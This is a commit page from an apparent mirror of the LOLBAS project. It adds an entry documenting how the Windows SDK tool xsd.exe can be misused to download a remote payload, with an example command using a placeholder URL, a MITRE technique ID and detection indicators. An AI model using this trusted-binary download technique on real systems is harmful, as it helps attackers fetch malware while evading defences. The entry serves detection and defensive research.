public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-27 07:18:05 +01:00
Code Issues Projects Releases Wiki Activity

Add Xsd.yml (#366)

Browse Source
This commit is contained in:
Avihay Eldad 2024-08-18 00:18:59 +03:00 committed by GitHub
parent 5b12df2b93
commit d5d11f47a1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 23 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
yml/OtherMSBinaries/xsd.yml Normal file
View File

@ -0,0 +1,23 @@
---
Name: xsd.exe
Description: XML Schema Definition Tool included with the Windows Software Development Kit (SDK).
Author: Avihay Eldad
Created: 2024-04-09
Commands:
- Command: xsd.exe http://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\{version}\bin\NETFX {version} Tools\xsd.exe
Detection:
- IOC: URL on a xsd.exe command line
- IOC: xsd.exe making unexpected network connections or DNS requests
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'